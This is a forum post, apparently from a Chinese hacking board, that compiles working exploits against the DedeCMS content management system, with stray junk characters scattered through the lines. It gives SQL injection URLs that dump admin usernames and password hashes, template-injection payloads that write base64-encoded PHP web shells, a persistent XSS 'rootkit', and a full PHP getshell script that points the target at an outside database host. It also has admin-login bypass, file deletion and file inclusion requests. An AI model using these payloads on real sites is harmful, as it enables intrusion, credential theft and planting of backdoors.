找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3218|回复: 0
打印 上一主题 下一主题

dedecms漏洞总结

[复制链接]
跳转到指定楼层
楼主
发表于 2012-10-18 10:42:14 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
0 Z  G3 U3 B1 S2 s+ ^- P; \8 z: h- M
Dedecms 5.6 rss注入漏洞
2 R" T* M0 U' r4 k3 u
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=15 i: q9 m7 K* P6 Q

2 Y8 r4 Y7 J; }1 f/ m4 A- r6 s5 Q
7 o- e9 n8 @: a: E+ f
, C# O/ s0 m/ N2 G/ I6 ~1 k( x3 x; l

- O1 a3 j8 c+ f$ ~, q' o. a) |( X# W$ U

  i$ }. |9 L$ \3 g+ w! @' `% S
% j& b# J6 \+ qDedeCms v5.6 嵌入恶意代码执行漏洞
4 U2 N7 f" @, z+ e- L2 |" @  g注册会员,上传软件:本地地址中填入 a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}
' H- d2 h" g# m* N发表后查看或修改即可执行; G" J( \8 H: j- ~# Q
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
0 d. {( W& L$ H% u, |4 ?, O生成x.php 密码xiao,直接生成一句话。& Y, G- w5 {* F: Y
' j+ `9 G. z7 B# r

+ ?" B2 @/ m3 P; R, h7 w, @8 B# c7 I  O  C/ B& x
  f9 C$ O+ j4 n# N9 l& x

. L6 E. p) W% Y" ]" f# {' H: g3 q7 x1 f( L3 |, a, r

4 ]+ Z1 N+ Z; h0 K6 O! \7 e& u" d' ^1 S
Dede 5.6 GBK SQL注入漏洞4 k- G) q. V" u" M, ?8 i# q
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';- Y1 x& T0 f6 k5 C! b0 }
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe
  r0 s; Q8 f' u1 h/ Xhttp://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7
5 I. A; |: D; [' m
. K9 w, ^' _1 r; M# [1 x( Q8 s( ~, Z# m! w9 K+ V7 d
! ~2 k! I# _7 r: b( N4 E

. Y& J* m+ ?+ r4 x1 c
4 q, Z6 t. ~( D3 V
+ Q5 s+ ^) U% p# T/ [
- J2 j. K/ s; a& i' k& ?' a+ r
& O$ D0 w0 n) {3 r, q, IDedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
) A  e2 N* h" r$ A- x
http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin` 8 ~- s) Z6 d; w
1 F( d  s% L$ d! Q7 G, W6 a

5 I$ s: h( T3 q6 ]0 y& A6 h; y4 }2 g- |6 P5 |! I# ?

+ @8 D* w4 T% ?4 u
5 U3 {) f0 ^3 s; h1 F& d
* ]6 u) g* ]+ z5 E/ q. ?DEDECMS 全版本 gotopage变量XSS漏洞: }* \. o8 y+ B$ _
1.复制粘贴下面的URL访问,触发XSS安装XSS ROOTKIT,注意IE8/9等会拦截URL类型的XSS漏洞,需关闭XSS筛选器。
0 X2 o. J% u* \/ P
http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="
1 ~; E: b! M$ v6 e
: [/ r  ^: L4 h' q1 J+ a9 F6 i9 Q6 Q5 ~1 Z9 H3 y$ Z! ^1 S% g! I
2.关闭浏览器,无论怎么访问下面的任意URL,都会触发我们的XSS。
3 J5 V8 S7 C: B- U- i& e, |
http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda
: m, S) k9 u* t$ B/ ]; u9 T$ G2 f
" B# G. B1 Q# R! g. j& A0 @9 ^: s1 P
http://v57.demo.dedecms.com/dede/login.php
  y" @* H7 X4 v0 ~, L8 l2 O7 ?
+ N6 u* Q, w! A
. z% B/ s+ N0 G9 ^color=Red]DeDeCMS(织梦)变量覆盖getshell
$ v" a, C  U, @' q; j3 j#!usr/bin/php -w
4 Z4 l# f9 L# V( v4 R* v<?php
7 Q' u' C+ R3 r5 q) O, Qerror_reporting(E_ERROR);
) Y: h+ v8 K+ gset_time_limit(0);
; X1 }0 K/ X5 A) Aprint_r('8 U! x7 H9 b2 K; J' l6 b0 y2 \( m/ P
DEDEcms Variable Coverage
1 P' O; a6 X1 j0 K' HExploit Author:
www.heixiaozi.comwww.webvul.com
4 l4 r6 s) P4 I9 |);
+ R/ O. K% T6 d: \- Aecho "\r\n";
, |. d- l8 _) M, b7 g* {; tif($argv[2]==null){7 w7 F& d3 L" _) H- l
print_r('
' e) x! X6 [3 j1 s% l& l3 F+ b+---------------------------------------------------------------------------+
5 O. N1 |5 e1 K3 t4 ]% ~" e  {% vUsage: php '.$argv[0].' url aid path
1 X$ Q/ t/ {! [aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/* ^+ n  d0 U/ w3 W) U
Example:
/ }7 o* @# G% b$ s7 w/ S6 \5 Nphp '.$argv[0].'
www.site.com 1 old# [5 c: i1 o9 E4 C9 r6 A, [
+---------------------------------------------------------------------------+! Z: p8 n5 M: \' V6 S. ]" H
');
5 W; @- {. P* F& U( i3 Hexit;. N' u' r+ f' m! r0 Q0 J& ?
}
4 P- M( X3 W7 s9 `$url=$argv[1];
5 v: u% @6 ~/ o0 i; [$aid=$argv[2];- h: o( `# Q2 N! }) C8 t
$path=$argv[3];
/ ^1 r3 }) v5 Q# g$exp=Getshell($url,$aid,$path);. z' G: ?/ j! [  x: O; m+ _# u
if (strpos($exp,"OK")>12){* t" I# Z$ I+ l8 @8 r* p% y$ x. C
echo ", r0 A' K/ E: v5 K
Exploit Success \n";
1 U' Q- Y3 b9 K5 I' N9 uif($aid==1)echo "
1 f! C" i/ Z5 q. \7 Y- g$ L! Q% D( ^Shell:".$url."/$path/data/cache/fuck.php\n" ;
4 c9 b' S* l7 G: W0 I5 O" h) D4 T7 C
; k6 y- R* V, e8 b
& U& o: c$ o2 Lif($aid==2)echo "
, |2 h4 `  u7 t9 A8 `; E7 `Shell:".$url."/$path/fuck.php\n" ;& \' N- @0 h* f
% W* V! c$ o7 I4 w) x
: `& S8 L! C. c& N" e4 _' |
if($aid==3)echo "- P5 k8 D  x( ?% u* Z4 |
Shell:".$url."/$path/plus/fuck.php\n";5 I# a; g. i8 [9 L6 ]+ m1 q7 Q

% i  k! i8 D! f
. ?# f6 Z3 \" D( F1 v/ l}else{
" b8 Z# I# j8 J! Qecho "
6 t( ~0 O( B# z1 s5 }0 _  {5 dExploit Failed \n";
3 |4 r' ?" u) Z/ f! m% y}) z: m9 }5 P# r0 ], w+ ?
function Getshell($url,$aid,$path){
; r1 B- l: Q# @) b$id=$aid;
( @4 z8 N" y4 v: K# d1 J( l5 ~$host=$url;
- u1 a, W  l+ U* U$port="80";- W( M4 l' Q' }  J# J4 O
$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";; P+ Q! `5 t. }: X0 v1 w
$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";# Z/ g3 \! `: w8 J/ `* \3 V2 ?
$data .= "Host: ".$host."\r\n";% j/ G  @. I( @: U, P& H3 v
$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
  ~: ^( }- p/ e9 B$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
, v; V" r+ _( z  l- e9 k$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";' j9 U6 P& Z5 v( a) _: d
//$data .= "Accept-Encoding: gzip,deflate\r\n";# T% ^% K4 j$ w9 L
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
2 J( g% |. i; u+ r2 a$data .= "Connection: keep-alive\r\n";" B- e4 b! u7 @0 Q6 I( W8 b  H
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";! V, E  e- @8 y: G; v+ f8 B! w
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
! V3 G3 a! \. ]8 m( P$data .= $content."\r\n";
+ @* u: p: f- S9 D- J$ock=fsockopen($host,$port);
0 U) M) K2 _% I+ Z* Qif (!$ock) {
! d, f  \' l* g3 z8 J# decho "7 l, w. M4 p! j  o9 S' I
No response from ".$host."\n";
, W" P" {' b/ ]) V- k}6 g  Z1 ^6 }9 v$ `: ]5 A
fwrite($ock,$data);; X( a- \, N5 x$ `
while (!feof($ock)) {+ N1 @0 ?! U1 u5 H' S
$exp=fgets($ock, 1024);
; q1 e" f6 a$ n8 _( x9 ~return $exp;7 Q7 x" C( ~, \
}
5 E9 g! W5 Y% P. |0 G}
3 z" G$ z$ g8 Q+ J7 ^/ s
4 _% E3 |$ @( F' m: x* t- |
  {: v; h5 Q2 T. R7 I?>' P% s( O) s  j- ]; M& ]
' |* s- N3 g9 P  d- y* Y5 D. I$ U

% D0 x, i; S0 A" b' y- w
) z7 x2 _1 ^$ _0 R- U4 T1 m+ m' P1 J0 B/ W. C, X; y) Q

0 x' A- ~# n  k5 d/ m( O: G
1 a6 K3 z; s/ f" k/ j& B* v$ m( v" d$ L% ?4 \3 l; x
  @* J. s7 Q+ c% Z
2 K0 N& N7 ~: J) T

1 z4 z6 V6 u: R2 BDedeCms v5.6-5.7 越权访问漏洞(直接进入后台)
8 j; D" A" h+ T' b
http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root$ m1 Q2 s# r  h$ g- R* ?; w3 c
! M' b  u; Z0 n8 x' d/ @" h

% u$ s  |) I' v% j把上面validate=dcug改为当前的验证码,即可直接进入网站后台# z* g) f7 L1 H2 t2 V- q* @, }

7 c3 H9 Y9 D% ^* S1 O  ^# E5 s6 k1 ?* Z/ Z
此漏洞的前提是必须得到后台路径才能实现4 G- k! L1 e# g8 N- @5 N
# j4 r* P1 A8 C% i) ?
8 O0 \% D( N# W2 z

$ F& ?- n$ c: O
, `! d( T% \( u& i/ y# b3 u5 H2 V5 u

9 ~# E7 d5 T1 j* K1 M6 D! ]8 w  b! n

! p4 R. \/ @' ?8 d" C" G; c. |2 T% H# P! j2 r
; I) D; T; E$ d7 D, i
Dedecms织梦 标签远程文件写入漏洞  Q% I1 K4 u9 i8 ~1 \
前题条件,必须准备好自己的dede数据库,然后插入数据: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');! ^) B3 b" X1 h# A1 h
7 I! h  c0 y5 E: V* Y1 Z6 v3 E
/ q" u$ z5 U; f0 E2 _) A9 G, q" Q
再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。 7 V% F8 b: O: o9 R  U
<form action="" method="post" name="QuickSearch" id="QuickSearch">
( F. ~# [- A. s% x1 \/ j' J. \( m<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />$ G8 e6 Y* r. I- q
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />- y; V, a& U% F3 P% ?2 w. d
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
# x7 Y6 w1 m+ f3 h+ y. s6 a<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
" E. @! B) J1 O/ J& ~<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />* e1 m; `* u0 ~) v! {$ u. B/ _2 i6 }3 ]
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
0 R7 U) k. J9 G% h; p. N<input type="text" value="true" name="nocache" style="width:400"># D7 z+ X/ H1 S5 u
<input type="submit" value="提交" name="QuickSearchBtn"><br />, b" [: G$ `2 G  C8 }, t
</form>2 d' O7 N6 z$ m
<script>' e$ u8 M* f  F
function addaction()5 O( B* ?) O' r2 w8 v: m# V4 w/ q
{1 {5 X; T# ^% ~1 P" J$ X) `- F
document.QuickSearch.action=document.QuickSearch.doaction.value;: {6 b: ~: a, @6 X3 f8 R
}
7 o7 H  K# y/ S</script>
+ t, R  v8 y% X2 Q
$ V( K3 [. o" E7 Q$ {* M- n$ V4 X6 Q' `  w- ~. K

# Z7 q' G' d9 X% G/ V7 I8 t3 D4 N0 t+ P- O7 i- J3 d
, y3 [; g, T1 u( p3 P& P8 `

5 ~3 J& x0 ]+ E: L
( R3 y, r$ Z* {' T8 v5 u8 V3 ^$ s( o3 H" r# G4 `
( \8 A9 @0 m. `4 ~( x; v, M- d

9 M' K  ?, R$ j: Y- {5 H8 DDedeCms v5.6 嵌入恶意代码执行漏洞
: }1 M! F1 e  l( r& t- S4 a注册会员,上传软件:本地地址中填入a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57},发表后查看或修改即可执行
2 m. K) t2 `- Z9 v% Q. v9 Y0 Ga{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
; i& W: o; @! }# n) c. N: N生成x.php 密码:xiao直接生成一句话。密码xiao 大家懂得4 m- l0 |% o) f/ o+ f7 s
Dedecms <= V5.6 Final模板执行漏洞+ L, D6 l# O$ |: K/ a
注册一个用户,进入用户管理后台,发表一篇文章,上传一个图片,然后在附件管理里,把图片替换为我们精心构造的模板,比如图片名称是:
  r: h" D) \/ j. `uploads/userup/2/12OMX04-15A.jpg+ i( U: X( L5 m. W% F

- q% H0 ]" G' \
% Q! P* t+ U1 w& s) I模板内容是(如果限制图片格式,加gif89a):5 e( e$ e+ K# A$ y0 U& a+ g, E
{dede:name runphp='yes'}# ]1 p* K3 j2 p  Q' g. P
$fp = @fopen("1.php", 'a');+ D9 ?* v7 O1 P: k. v8 c
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
& I( L+ v3 m1 ~  F8 k6 M7 h@fclose($fp);
! |+ F, f% O" @% a{/dede:name}9 q4 r+ x- a- c0 y( m
2 修改刚刚发表的文章,查看源文件,构造一个表单:$ h/ n2 i$ n) c1 X
<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
+ S6 ]* ~# U7 U8 E) v5 x<input type="hidden" name="dopost" value="save" />- F- u3 I- O3 }! P( W- d- i! ?& u2 G
<input type="hidden" name="aid" value="2" />! `+ e& Z" c  |- P
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
# ~. Y1 p1 e" N# A0 z- p<input type="hidden" name="channelid" value="1" />( `5 y4 V$ s- H2 i
<input type="hidden" name="oldlitpic" value="" />( _4 W; B2 e& d! o( t" J
<input type="hidden" name="sortrank" value="1275972263" />
& H$ l- x" f( l6 [: R; y) X' T  `0 F0 C6 ^. J  q

* z4 G; k3 a  E* @( a, Q<div id="mainCp">
; o8 l9 B0 X- F/ U  Y! e: N3 P( j3 X<h3 class="meTitle"><strong>修改文章</strong></h3>' K0 _! p, t8 l! O: R, j. Z+ |

" K; f- j2 m' h, i  K8 q) D
$ V" \7 U  N1 Q' N' d8 U<div class="postForm">6 A* f( u0 L2 N
<label>标题:</label>& I  W2 u$ O# _' f' D
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>, T, K3 @; [* y; \- t

: d0 }0 I- w0 a" C6 g* o
, }/ U; k! @" I( f' b; g<label>标签TAG:</label>
2 \/ W6 C8 a. m' \<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)
- {+ T9 ]8 N2 m2 A7 V) l
1 ~/ h# h) E. L
8 N4 D- |0 g: ]' `+ w<label>作者:</label>
" ?2 b8 v+ O8 L" B: ~: }<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>
! w/ A, }/ ~6 Q; p+ o  ^$ w" ^. ^* i" D

: r9 U! h5 x! S; Q* i, p<label>隶属栏目:</label>  F9 _) J! e3 v0 @" Q9 J! l8 a
<select name='typeid' size='1'>
8 f. m: ]) Z& S, f<option value='1' class='option3' selected=''>测试栏目</option>
) b9 [4 ^  g, i! |0 s; P</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)
; m8 j2 z! a4 t  i9 b% x2 Z) F! m! o5 W% u+ e

/ J2 l3 m+ V% X<label>我的分类:</label>2 T5 l9 m& p  y5 K: c1 T
<select name='mtypesid' size='1'>: g( C" `4 G8 q7 W9 z) A/ {0 ~
<option value='0' selected>请选择分类...</option>
! u. b! T7 e( Z<option value='1' class='option3' selected>hahahha</option>7 T- W7 p0 c/ N0 [! Z
</select>
0 Z1 s) N2 Q# v. W9 w% f( x
/ b% H, o5 h! W! D
, Q, k) g0 i& K" B1 l<label>信息摘要:</label>
$ G8 N# ^8 B7 c- ^. M<textarea name="description" id="description">1111111</textarea>
  i: Q- ]& u& a) g7 x3 j(内容的简要说明); c) Z! j2 [4 `0 ?; t
1 W6 F( h4 m( j9 g

5 f4 w$ [) J; V: ?2 X( C) M<label>缩略图:</label>  y8 A$ Q- _9 j) G
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>: l( T% i/ N( k' c: v

4 _0 [' U6 E0 `, w1 c9 h) Z8 U0 C* _( f! [
<input type='text' name='templet'
- G* V9 x1 \- W# v+ k2 f, Zvalue="../ uploads/userup/2/12OMX04-15A.jpg">+ A" a& c2 J1 h$ |
<input type='text' name='dede_addonfields'2 }. f6 [0 l( u5 u- j8 O1 s
value="templet,htmltext;">(这里构造)
% K" t% U$ ^7 W7 L. X' }" n</div>/ s3 I3 x' P' g- e  M
5 t: k7 F4 o8 z, U% `  i: D0 n) \9 K

8 t; c& X; o$ D9 h7 ?<!-- 表单操作区域 -->
3 N: b; f" s4 ~( V: ?) S+ ^<h3 class="meTitle">详细内容</h3>. `& ~0 Z0 m, F: G- F3 x7 E

: K. c  n4 J& U- I6 E. ~3 O5 M' Z1 h/ z5 f
<div class="contentShow postForm">
* {1 @( c; }& x- x; s) N<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>
4 \% [/ u" u5 }0 ~. d. v( j( _) n( X' c& s6 Q

1 p" @% Y$ c; t. u: R<label>验证码:</label>$ p5 [7 C+ ]1 p+ c4 B7 `
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
1 K* M9 [# m  J" M; N+ v2 p<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />  n* S9 Z- E7 T+ M* O2 [9 a
5 u3 q5 K4 Y$ m2 `+ o

: o- N, c2 B( x; n2 x<button class="button2" type="submit">提交</button>$ x+ d. @8 Q. \5 W
<button class="button2 ml10" type="reset">重置</button>9 o1 H/ A+ Q/ ?) V! z' d" _5 r
</div>; {5 L2 o& f* V

9 t+ V5 E! f* s) Q5 X8 F5 A0 s! U
, }/ ~4 B* U7 [9 r+ K; b! G; V</div>2 ~$ u2 J) X& ]7 F

  u1 t2 F* Y: e  p; a4 G  M  j- S& r- J! u. K
</form>
2 h+ W# c) H3 P8 r2 m% H0 ?7 W% d$ S! e& i4 |' u# Z
7 t) w: C6 y+ h2 |
提交,提示修改成功,则我们已经成功修改模板路径。 3 访问修改的文章:
, B3 H0 I' ~8 }2 k假设刚刚修改的文章的aid为2,则我们只需要访问:
& \- J1 Y6 ]( C
http://127.0.0.1/dede/plus/view.php?aid=2
8 w: i- X5 z0 [& n! U. d- F, d7 f即可以在plus目录下生成webshell:1.php) d2 ~1 D8 R6 f' @

/ g5 U) e. O9 \5 e
, M: L+ A* h6 w0 s' y& \( J
" g) r  ?% r( U0 Z6 h2 I( h) `3 ]$ n  Q5 [# P; c

; g8 r2 O: ^1 u$ k4 d9 Z1 v" @
- {- `) K( C" W3 H5 C% a2 ~- k
* b$ t3 U8 Z/ \, s# q, f7 M) F3 F: W, M; f7 j9 M0 F4 v: [

: x  d% M' s. E* U5 B* P' a5 U! \* q: g- f  \- }7 r' c

- d& O9 S; w6 s0 q; k& |3 c7 V3 ~6 g
DEDECMS网站管理系统Get Shell漏洞(5.3/5.6)& i7 f6 M' m# N( Y
Gif89a{dede:field name='toby57' runphp='yes'}9 `( b: B, y( j1 {
phpinfo();
3 J  Y/ Z( M. f# U- K" O3 m" O7 F{/dede:field}
2 p2 Z  o4 f2 i* D8 K# l保存为1.gif. S- b+ a; Z& h4 c* K
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" ">
3 A6 K2 h4 n4 l$ K+ h' M, f+ g; e<input type="hidden" name="aid" value="7" />
- Y4 g' e0 R$ P<input type="hidden" name="mediatype" value="1" /> # Q* c  ?" S7 l& P
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br>
, F' W& I% V- b<input type="hidden" name="dopost" value="save" />
# D$ H6 m: e6 [<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/> 1 `$ V0 k- L. q& F1 e( Q
<input name="addonfile" type="file" id="addonfile"/> ) \& M' u$ T- N9 B! j1 W
<button class="button2" type="submit" >更改</button>
! O5 [1 |, t/ ^! h( D</form>   c( s! b, n, @
% y0 a, n5 r# x8 T, q8 ?, i# G
% a! G& W, J& ?: z1 ^
构造如上表单,上传后图片保存为/uploads/userup/3/1.gif
( E* Q+ X% b/ U$ K$ Y6 u- ]$ y! t发表文章,然后构造修改表单如下:6 T; m& I# m8 |8 i( D
2 H  _' E- @7 Q5 L
! |4 R2 }+ ?# Z* {" F
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
. B" |0 Q$ `/ B; B* d- y<input type="hidden" name="dopost" value="save" /> / }3 ]+ P* u  Z" I
<input type="hidden" name="aid" value="2" /> $ |3 |# q  M# {* e0 o. Y3 N8 x9 f( e1 q
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
9 R8 s: `/ X8 [<input type="hidden" name="channelid" value="1" />
8 K6 ?* \0 F% d# _<input type="hidden" name="oldlitpic" value="" /> . g* v/ q# |/ X  y: U* ~7 G! q8 J
<input type="hidden" name="sortrank" value="1282049150" /> # R  r8 Y0 r* ~7 @
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/> & v( L" F$ ~( Q. h" `: ^
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
- T& ]4 W( O5 D+ u' E- d<select name='typeid' size='1'> 2 j' n/ I( G# v: }" K/ L
<option value='1' class='option3' selected=''>Test</option> - d. z3 [2 _7 H6 p; T4 N- @0 ]
<select name='mtypesid' size='1'> + e3 I: Z( U- A; x4 h# D
<option value='0' selected>请选择分类...</option>
& u" I' f& m: ^; K- ]& C<option value='1' class='option3' selected>aa</option></select> 3 R" I+ Q' ?! i# D6 ?1 i# l0 \4 l
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea> 3 a1 B+ ^3 ~& S8 X4 A6 a
<input type='hidden' name='dede_addonfields' value="templet"> 2 {3 j9 [- X; E0 e( d  Y% y
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
0 t" B) ]+ b! I6 v<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
2 v1 y7 j4 ^1 Q+ S& w0 {+ ~<button class="button2" type="submit">提交</button> : K. h$ M, W6 \
</form>
  J7 z' U+ }! l$ n! k, m
2 J, \3 g* z  m( V9 c- h  Y: N3 O  T5 \' r( r4 f
9 T* U8 ?2 a1 |+ X9 z6 o

6 A  X9 Q+ h% ?3 N" I
$ X( n8 K3 X4 q4 W: J% U( H7 |
: X/ N9 l- `* a# }2 S
7 M; S0 d6 @* b9 k/ _
0 O; L# F5 t  Q& S$ f( B) `
  s9 C8 @/ E6 z2 g: b  e& Q" f& M' o5 @' k' @& J1 E4 w+ @

+ o: r! c: B+ y5 R9 g6 M+ h' q" r5 G' f, L4 E$ O0 e
织梦(Dedecms)V5.6 远程文件删除漏洞  V4 S* Y+ {, d6 b
http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif
. b0 t6 Z1 P1 w0 ?
5 P2 g& H5 O8 |* S9 C; @/ T! s4 w' x3 S( z7 l

9 C. S: l+ p, {8 P! {
/ M5 i! i& ^, Q" d" o7 z) _6 n9 G9 l5 ?& h2 V5 J1 G* |
3 B3 }, a( E! Y; k' Q8 z1 W: `. e5 |

- G4 A! \7 P1 ^/ K# C# q- @( z" b9 _2 w, _7 F! L$ _) B
: s, B% Y1 l* D% @+ A2 r5 p

1 U" p% F1 U# A& A) A织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞 3 n  _* v5 X" N4 ?. \0 W5 {1 {
http://www.test.com/plus/carbuya ... urn&code=../../% o9 Y8 ~$ q* t5 t6 a* c

/ C" a2 Z8 n% d$ D/ q' z( _  _4 d3 o+ `3 M5 d0 N

+ A- u) G3 P) U8 ^( }: f
/ D0 p$ n1 u2 G+ _1 A
1 Q/ |8 b, ?7 }* o: f, p; ]  |
0 V, P7 P" W0 }5 h8 j1 R$ D& |1 S3 Q0 z- J+ D4 V
0 q  V, C, s) e  e+ i* O, O5 |
* H  Z2 d8 X; F1 N4 T+ v6 X6 C

  B! {9 w  S' cDedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞 # ?' r) ]6 q+ a! |# c" q; ~3 P
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`! k  j% |& ?% M+ a$ k) C+ S' F, U
密码是32位MD5减去头5位,减去尾七位,得到20 MD5密码,方法是,前减3后减1,得到16位MD50 w! T+ n/ _8 |0 _: f$ O4 J
1 }7 }* r- O4 T/ @4 x. M
" m0 ?5 z/ ]  a6 A2 t

, m6 F/ ~" Y6 b$ S
  e1 h3 _9 c5 ~  ^. G7 r7 T. m4 O# w. G) c4 G9 W
3 Q1 H/ ~4 x0 P9 b

: x$ D% u' p! a! U+ A/ y+ z1 i) R( u' h0 U3 H0 d5 G( p

* g2 j  M6 ~: f. a  }8 M
! R0 h" o9 e, ~5 ?1 W织梦(Dedecms) 5.1 feedback_js.php 注入漏洞3 ?( v& t$ [* m3 E0 L4 }+ z3 I
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='
" [/ Q- Y$ M! _  j2 }
